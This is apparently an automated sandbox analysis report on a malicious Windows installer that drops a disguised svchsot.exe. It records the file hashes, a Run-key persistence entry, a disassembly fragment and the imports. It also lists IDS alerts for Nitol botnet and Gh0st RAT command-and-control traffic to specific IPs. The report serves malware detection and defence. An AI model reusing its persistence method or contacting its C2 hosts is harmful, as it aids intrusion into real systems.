Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 109
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: G3izWAY3Fa.exe (renamed because the original name is a hash value)
Original Sample Name: 118F7F61B6AFB1DA5E94EA1740222C73.exe
Detection: MAL
Classification: mal78.spre.bank.troj.spyw.evad.winEXE@155/6@4/3
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 166
• Number of non-executed functions: 225
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56, 52.149.20.212
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtFsControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: G3izWAY3Fa.exe
Time | Type | Description
08:13:18 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run XXXXXX05CA35CC C:\Windows\XXXXXX05CA35CC\svchsot.exe
                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0035.t-0009.t-msedge.net | FBVmDbz2nb.exe | malicious | LummaC, Stealc | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | mgEXk8ip26.exe | malicious | LummaC | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 4je7za5c0V.exe | malicious | Clipboard Hijacker, Cryptbot | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | nTyPEbq9wQ.lnk | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | uuOuIXWp1W.exe | malicious | Clipboard Hijacker, Cryptbot | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | dnf5RWZv2v.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | ME3htMIepa.exe | malicious | Clipboard Hijacker, Cryptbot | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | stealcy11.exe | malicious | Stealc | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | skIYOAOzvU.exe | malicious | LummaC | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | fiFdIrd.txt.js | malicious | Unknown | 13.107.246.63

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CHINANET-BACKBONENo31Jin-rongStreetCN | armv6l.elf | malicious | Unknown | 61.146.165.65
CHINANET-BACKBONENo31Jin-rongStreetCN | armv4l.elf | malicious | Unknown | 14.118.130.115
CHINANET-BACKBONENo31Jin-rongStreetCN | 2.elf | malicious | Unknown | 59.175.154.153
CHINANET-BACKBONENo31Jin-rongStreetCN | 3.elf | malicious | Unknown | 36.45.84.63
CHINANET-BACKBONENo31Jin-rongStreetCN | loligang.sh4.elf | malicious | Mirai | 123.163.227.84
CHINANET-BACKBONENo31Jin-rongStreetCN | loligang.arm.elf | malicious | Mirai | 111.226.186.147
CHINANET-BACKBONENo31Jin-rongStreetCN | loligang.mpsl.elf | malicious | Mirai | 27.146.124.78
CHINANET-BACKBONENo31Jin-rongStreetCN | loligang.arm7.elf | malicious | Mirai | 111.182.110.21
CHINANET-BACKBONENo31Jin-rongStreetCN | loligang.ppc.elf | malicious | Mirai | 119.120.60.137
FASTWEBIT | 3.elf | malicious | Unknown | 93.43.39.17
FASTWEBIT | nshkppc.elf | malicious | Mirai | 81.208.26.156
FASTWEBIT | spc.elf | malicious | Mirai, Moobot | 93.55.23.150
FASTWEBIT | x86.elf | malicious | Mirai, Moobot | 93.36.234.160
FASTWEBIT | nshkmpsl.elf | malicious | Mirai | 81.208.26.144
FASTWEBIT | na.elf | malicious | Mirai | 37.186.250.137
FASTWEBIT | mips.nn.elf | malicious | Mirai, Okiru | 2.235.85.103
FASTWEBIT | mips.elf | malicious | Mirai | 93.41.34.191
FASTWEBIT | nshmpsl.elf | malicious | Mirai | 2.229.236.206
FASTWEBIT | nshmips.elf | malicious | Mirai | 93.43.39.12
                              No context
                              No context
Process: C:\Windows\Temp\server.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 7
Entropy (8bit): 2.8073549220576046
Encrypted: false
SSDEEP: 3:qR:qR
MD5: 7A1920D61156ABC05A60135AEFE8BC67
SHA1: 808D7DCA8A74D84AF27A2D6602C3D786DE45FE1E
SHA-256: 21B111CBFE6E8FCA2D181C43F53AD548B22E38ACA955B9824706A504B0A07A2D
SHA-512: 94ABFC7B11F4311E8E279B580907FEFC1118690479FB7E13F0C22ADE816BC2B63346498833B0241EEC2B09E15172E13027DC85024BACB7BC40C150F4131F7292
Malicious: false
Preview: Default
Process: C:\Users\user\Desktop\G3izWAY3Fa.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1429612
Entropy (8bit): 6.009627235349156
Encrypted: false
SSDEEP: 24576:GvbBARGCfE5TVUUCql3jpomr6RTmBfOKpf37Q+zAV9/NaCWxI7IPBRiAY:WARGEvqlzpomr6RTmBfOKpf37Q+zAV92
MD5: CCEE0912E79D434F0D2C1E11274F23C0
SHA1: 9A34CD426601ACE88DCB91B3820DC98EBE29ED96
SHA-256: 679B9AF0DEF4DBBE2E179AC05F9A7AB4C2FFC28A71964A9E9EDF2986BDC1B1A2
SHA-512: B87212CC683F2DF362E11F1B509D29B482A9560E04E562E580BD58755F6FE25C0BBF4CB525E793F205656F16AD32C7B909FC53E9C137E8A5F4415BAA5FF0977E
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 4%
Process: C:\Users\user\Desktop\G3izWAY3Fa.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 196608
Entropy (8bit): 7.5898551091068285
Encrypted: false
SSDEEP: 3072:rDZrrTt3fP9ZGFwgvRLLCzOYFDq+UdnIPPlMzcsofIw+KaX0LcHLkMIIRRp:fph96wgvRHCzOYtqlGyzcsX3KA0LQIQh
MD5: 8A953A49796B7F8C7539A6B2BC175397
SHA1: 5E4B317DD08B080EDCF127FF6E5F86F0108372BE
SHA-256: ABC198E7B27D864DED945C2053C781E59CD5294BEE301D7D2B931A1F0D4087A7
SHA-512: 5CE1705F04E29267EC6BDF8D6D2309D5DBE05CD2C0D70A4D8DBC5FDF7060F53092A8254369CB9F20952A43F09B06C11D455003B4ACAEE6F536ECBAFF9929F118
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 95%
Process: C:\Users\user\Desktop\G3izWAY3Fa.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category: dropped
Size (bytes): 16896
Entropy (8bit): 7.562483931351241
Encrypted: false
SSDEEP: 384:PWxP8NYOCgS7+h4vIpWEXSPTNy2ineaLM1ies89sxLrG:uaiOCz6n4EXS7rirVer9sNr
MD5: 48A02F4A003E8CBE683CF5DADA237168
SHA1: 2A81C0962ADEEF89CE33DE746ADFD455C652D216
SHA-256: 11933D11631C99743C3F457B30D5EBB72399BF52D53B51E9CD21E17B1CA1DFB0
SHA-512: A372B54806840A1D6DDAAFDCB7D5D1218A086DED2FE51C70C89034BA6CB9D644AC914AF998A4E4F614E0C990A864059A8618B1EDD28D39CC96C6FC74D9631F12
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 100%
                              Process:C:\Windows\Temp\server.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):196608
                              Entropy (8bit):7.5898551091068285
                              Encrypted:false
                              SSDEEP:3072:rDZrrTt3fP9ZGFwgvRLLCzOYFDq+UdnIPPlMzcsofIw+KaX0LcHLkMIIRRp:fph96wgvRHCzOYtqlGyzcsX3KA0LQIQh
                              MD5:8A953A49796B7F8C7539A6B2BC175397
                              SHA1:5E4B317DD08B080EDCF127FF6E5F86F0108372BE
                              SHA-256:ABC198E7B27D864DED945C2053C781E59CD5294BEE301D7D2B931A1F0D4087A7
                              SHA-512:5CE1705F04E29267EC6BDF8D6D2309D5DBE05CD2C0D70A4D8DBC5FDF7060F53092A8254369CB9F20952A43F09B06C11D455003B4ACAEE6F536ECBAFF9929F118
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 95%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L...r..N.................P..........9........`....@.........................................................................Td..<....................................................................................`...............................text....D.......P.................. ..`.rdata..|....`.......`..............@..@.data........p.......p..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\SysWOW64\cmd.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):24
                              Entropy (8bit):4.188721875540868
                              Encrypted:false
                              SSDEEP:3:oCfe49:oCfD
                              MD5:6B2C41D2A2AF44EFB642F9C3DBCA6668
                              SHA1:5D98044E6220AD035474C209EF75CB8F37C6965C
                              SHA-256:623F011819A1BD73F84EE6593735C89462E596A4AD0B730B0F650A486D63E4C8
                              SHA-512:8C419F40477E11A315F30F79F61EFC17178B2C851276F4FD35175032073296787610DB29DA9C99A8B97551F22B01625A2F19CAFF6CD25B6F5E691AD56C3822E9
                              Malicious:false
                              Preview:C:\Windows\temp\v5.exe..
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Entropy (8bit):6.913255582101916
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 92.16%
                              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:G3izWAY3Fa.exe
                              File size:963'286 bytes
                              MD5:118f7f61b6afb1da5e94ea1740222c73
                              SHA1:5a0d66ec18cdb3812bad259999cf64d051cefa8b
                              SHA256:aaf88339c23080ffd423da3b03a229d220b55c5e007c1f413fbd3633c48aad44
                              SHA512:a98dc6940d0a3026075b77d406f5481a0071c1c6465027f3da13716932e0fd6bd06c73a48aa068ba2206210b7f9ab057232323c548f090d71baa5d4ba128e791
                              SSDEEP:12288:YIrxBdnioD+GL4DY6TMMQ77iOF8X8WBBXnBZwECeLqq3RCmK9JI25q5iedndTIQe:PBRiEUDpZQ1abzwEJLfRWzIiednd518
                              TLSH:F425F04E65955B82C8F40D34837AB22E41246D1B49F4A7F5B4A9FF0EF93CC89CD36A21
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z.........
                              Icon Hash:2e6343696c6b572e
                              Entrypoint:0x4030cb
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              DLL Characteristics:TERMINAL_SERVER_AWARE
                              Time Stamp:0x4B1AE3C1 [Sat Dec 5 22:50:41 2009 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:7fa974366048f9c551ef45714595665e
                              Instruction
                              sub esp, 00000180h
                              push ebx
                              push ebp
                              push esi
                              xor ebx, ebx
                              push edi
                              mov dword ptr [esp+18h], ebx
                              mov dword ptr [esp+10h], 00409160h
                              xor esi, esi
                              mov byte ptr [esp+14h], 00000020h
                              call dword ptr [00407030h]
                              push 00008001h
                              call dword ptr [004070B0h]
                              push ebx
                              call dword ptr [0040727Ch]
                              push 00000008h
                              mov dword ptr [00423F38h], eax
                              call 00007F24E4E7FCA6h
                              mov dword ptr [00423E84h], eax
                              push ebx
                              lea eax, dword ptr [esp+34h]
                              push 00000160h
                              push eax
                              push ebx
                              push 0041F430h
                              call dword ptr [00407158h]
                              push 00409154h
                              push 00423680h
                              call 00007F24E4E7F959h
                              call dword ptr [004070ACh]
                              mov edi, 00429000h
                              push eax
                              push edi
                              call 00007F24E4E7F947h
                              push ebx
                              call dword ptr [0040710Ch]
                              cmp byte ptr [00429000h], 00000022h
                              mov dword ptr [00423E80h], eax
                              mov eax, edi
                              jne 00007F24E4E7D0BCh
                              mov byte ptr [esp+14h], 00000022h
                              mov eax, 00429001h
                              push dword ptr [esp+14h]
                              push eax
                              call 00007F24E4E7F43Ah
                              push eax
                              call dword ptr [0040721Ch]
                              mov dword ptr [esp+1Ch], eax
                              jmp 00007F24E4E7D115h
                              cmp cl, 00000020h
                              jne 00007F24E4E7D0B8h
                              inc eax
                              cmp byte ptr [eax], 00000020h
                              je 00007F24E4E7D0ACh
                              cmp byte ptr [eax], 00000022h
                              mov byte ptr [eax+eax+00h], 00000000h
                              Programming Language:
                              • [EXP] VC++ 6.0 SP5 build 8804
                               Name | Virtual Address | Virtual Size | Is in Section
                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x57180 | .rsrc
                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                               Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                               .text | 0x1000 | 0x58d2 | 0x5a00 | c69726ed422d3dcfdec9731986daa752 | False | 0.665234375 | data | 6.4331003482809646 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                               .rdata | 0x7000 | 0x1190 | 0x1200 | a2c7710fa66fcbb43c7ef0ab9eea5e9a | False | 0.4453125 | data | 5.179763757809345 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               .data | 0x9000 | 0x1af78 | 0x400 | e59cdcb732e4bfbc84cc61dd68354f78 | False | 0.55078125 | data | 4.617802320695973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .ndata | 0x24000 | 0x8000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .rsrc | 0x2c000 | 0x57180 | 0x57200 | f51866e7e004246d34522d99909dd728 | False | 0.28211587607604016 | data | 3.929478885850329 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                               RT_ICON | 0x2c2b0 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 0 | English | United States | 0.25987883539959167
                               RT_ICON | 0x6e2d8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.31632260735833434
                               RT_ICON | 0x7eb00 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.4346473029045643
                               RT_ICON | 0x810a8 | 0xca8 | Device independent bitmap graphic, 32 x 64 x 24, image size 3072 | English | United States | 0.5481481481481482
                               RT_ICON | 0x81d50 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | English | United States | 0.5434426229508197
                               RT_ICON | 0x826d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.6453900709219859
                               RT_DIALOG | 0x82b40 | 0x144 | data | English | United States | 0.5216049382716049
                               RT_DIALOG | 0x82c88 | 0x100 | data | English | United States | 0.5234375
                               RT_DIALOG | 0x82d88 | 0x11c | data | English | United States | 0.6056338028169014
                               RT_DIALOG | 0x82ea8 | 0x60 | data | English | United States | 0.7291666666666666
                               RT_GROUP_ICON | 0x82f08 | 0x5a | data | English | United States | 0.8111111111111111
                               RT_MANIFEST | 0x82f68 | 0x215 | XML 1.0 document, ASCII text, with very long lines (533), with no line terminators | English | United States | 0.575984990619137
                               DLL | Import
                               KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                               USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                               GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                               SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                               ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                               COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                               ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                               VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                               Language of compilation system | Country where language is spoken
                               English | United States
                               Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                               2024-12-23T09:13:10.187285+0100 | 2807550 | ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 | 1 | 192.168.2.9 | 49902 | 120.48.34.233 | 8080 | TCP
                               2024-12-23T09:13:10.187285+0100 | 2807550 | ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 | 1 | 192.168.2.9 | 49841 | 93.46.8.90 | 8090 | TCP
                               2024-12-23T09:13:10.187285+0100 | 2807550 | ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 | 1 | 192.168.2.9 | 49863 | 120.48.34.233 | 8080 | TCP
                               2024-12-23T09:13:10.187285+0100 | 2807550 | ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 | 1 | 192.168.2.9 | 49989 | 46.82.174.69 | 8090 | TCP
                               2024-12-23T09:13:10.187285+0100 | 2807550 | ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 | 1 | 192.168.2.9 | 49986 | 93.46.8.90 | 8090 | TCP
                               2024-12-23T09:13:10.187285+0100 | 2807550 | ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 | 1 | 192.168.2.9 | 49985 | 120.48.34.233 | 8080 | TCP
                               2024-12-23T09:13:10.187285+0100 | 2807550 | ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 | 1 | 192.168.2.9 | 49988 | 120.48.34.233 | 8080 | TCP
                               2024-12-23T09:13:10.187285+0100 | 2807550 | ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 | 1 | 192.168.2.9 | 49928 | 93.46.8.90 | 8090 | TCP
                               2024-12-23T09:13:10.187285+0100 | 2807550 | ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 | 1 | 192.168.2.9 | 49987 | 120.48.34.233 | 8080 | TCP
                               2024-12-23T09:13:10.187285+0100 | 2807550 | ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 | 1 | 192.168.2.9 | 49723 | 120.48.34.233 | 8080 | TCP
                               2024-12-23T09:13:10.187285+0100 | 2807550 | ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 | 1 | 192.168.2.9 | 49770 | 120.48.34.233 | 8080 | TCP
                               2024-12-23T09:13:10.187285+0100 | 2807550 | ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 | 1 | 192.168.2.9 | 49761 | 93.46.8.90 | 8090 | TCP
                               2024-12-23T09:13:10.187285+0100 | 2807550 | ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 | 1 | 192.168.2.9 | 49944 | 120.48.34.233 | 8080 | TCP
                               2024-12-23T09:13:10.187285+0100 | 2807550 | ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 | 1 | 192.168.2.9 | 49816 | 120.48.34.233 | 8080 | TCP
                               2024-12-23T09:13:17.322358+0100 | 2013214 | ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server | 1 | 192.168.2.9 | 49717 | 120.48.34.233 | 8000 | TCP
                               2024-12-23T09:13:17.322358+0100 | 2016922 | ET MALWARE Backdoor family PCRat/Gh0st CnC traffic | 1 | 192.168.2.9 | 49717 | 120.48.34.233 | 8000 | TCP
                               2024-12-23T09:13:18.363697+0100 | 2025135 | ET MALWARE [PTsecurity] Botnet Nitol.B Checkin | 1 | 192.168.2.9 | 49723 | 120.48.34.233 | 8080 | TCP
                               2024-12-23T09:13:18.814318+0100 | 2048478 | ET MALWARE [ANY.RUN] Win32/Gh0stRat Keep-Alive | 1 | 120.48.34.233 | 8000 | 192.168.2.9 | 49717 | TCP
                               2024-12-23T09:13:18.814318+0100 | 2808814 | ETPRO MALWARE Backdoor family PCRat/Gh0st CnC Response | 1 | 120.48.34.233 | 8000 | 192.168.2.9 | 49717 | TCP
                               2024-12-23T09:13:37.071523+0100 | 2025135 | ET MALWARE [PTsecurity] Botnet Nitol.B Checkin | 1 | 192.168.2.9 | 49761 | 93.46.8.90 | 8090 | TCP
                               2024-12-23T09:13:41.286544+0100 | 2025135 | ET MALWARE [PTsecurity] Botnet Nitol.B Checkin | 1 | 192.168.2.9 | 49770 | 120.48.34.233 | 8080 | TCP
                               2024-12-23T09:14:03.725639+0100 | 2025135 | ET MALWARE [PTsecurity] Botnet Nitol.B Checkin | 1 | 192.168.2.9 | 49816 | 120.48.34.233 | 8080 | TCP
                               2024-12-23T09:14:19.283148+0100 | 2025135 | ET MALWARE [PTsecurity] Botnet Nitol.B Checkin | 1 | 192.168.2.9 | 49841 | 93.46.8.90 | 8090 | TCP
                               2024-12-23T09:14:26.436544+0100 | 2025135 | ET MALWARE [PTsecurity] Botnet Nitol.B Checkin | 1 | 192.168.2.9 | 49863 | 120.48.34.233 | 8080 | TCP
                               2024-12-23T09:14:48.925491+0100 | 2025135 | ET MALWARE [PTsecurity] Botnet Nitol.B Checkin | 1 | 192.168.2.9 | 49902 | 120.48.34.233 | 8080 | TCP
                               2024-12-23T09:15:01.201380+0100 | 2025135 | ET MALWARE [PTsecurity] Botnet Nitol.B Checkin | 1 | 192.168.2.9 | 49928 | 93.46.8.90 | 8090 | TCP
                               2024-12-23T09:15:19.384989+0100 | 2025135 | ET MALWARE [PTsecurity] Botnet Nitol.B Checkin | 1 | 192.168.2.9 | 49944 | 120.48.34.233 | 8080 | TCP
                               2024-12-23T09:15:34.537181+0100 | 2025135 | ET MALWARE [PTsecurity] Botnet Nitol.B Checkin | 1 | 192.168.2.9 | 49985 | 120.48.34.233 | 8080 | TCP
                               2024-12-23T09:15:41.766783+0100 | 2025135 | ET MALWARE [PTsecurity] Botnet Nitol.B Checkin | 1 | 192.168.2.9 | 49986 | 93.46.8.90 | 8090 | TCP
                               2024-12-23T09:15:56.678352+0100 | 2025135 | ET MALWARE [PTsecurity] Botnet Nitol.B Checkin | 1 | 192.168.2.9 | 49987 | 120.48.34.233 | 8080 | TCP
                               2024-12-23T09:16:19.335820+0100 | 2025135 | ET MALWARE [PTsecurity] Botnet Nitol.B Checkin | 1 | 192.168.2.9 | 49988 | 120.48.34.233 | 8080 | TCP
                               2024-12-23T09:16:36.233553+0100 | 2025135 | ET MALWARE [PTsecurity] Botnet Nitol.B Checkin | 1 | 192.168.2.9 | 49989 | 46.82.174.69 | 8090 | TCP
                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                               Dec 23, 2024 09:13:17.165060997 CET | 49717 | 8000 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:13:17.284657001 CET | 8000 | 49717 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:13:17.284813881 CET | 49717 | 8000 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:13:17.322357893 CET | 49717 | 8000 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:13:17.441999912 CET | 8000 | 49717 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:13:18.238933086 CET | 49723 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:13:18.292098045 CET | 49724 | 80 | 192.168.2.9 | 192.168.2.1
                               Dec 23, 2024 09:13:18.358541012 CET | 8080 | 49723 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:13:18.358630896 CET | 49723 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:13:18.363697052 CET | 49723 | 8080 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:13:18.483692884 CET | 8080 | 49723 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:13:18.814317942 CET | 8000 | 49717 | 120.48.34.233 | 192.168.2.9
                               Dec 23, 2024 09:13:18.859292030 CET | 49717 | 8000 | 192.168.2.9 | 120.48.34.233
                               Dec 23, 2024 09:13:19.296667099 CET | 49724 | 80 | 192.168.2.9 | 192.168.2.1
                               Dec 23, 2024 09:13:21.296703100 CET | 49724 | 80 | 192.168.2.9 | 192.168.2.1
                               Dec 23, 2024 09:13:25.296669960 CET | 49724 | 80 | 192.168.2.9 | 192.168.2.1
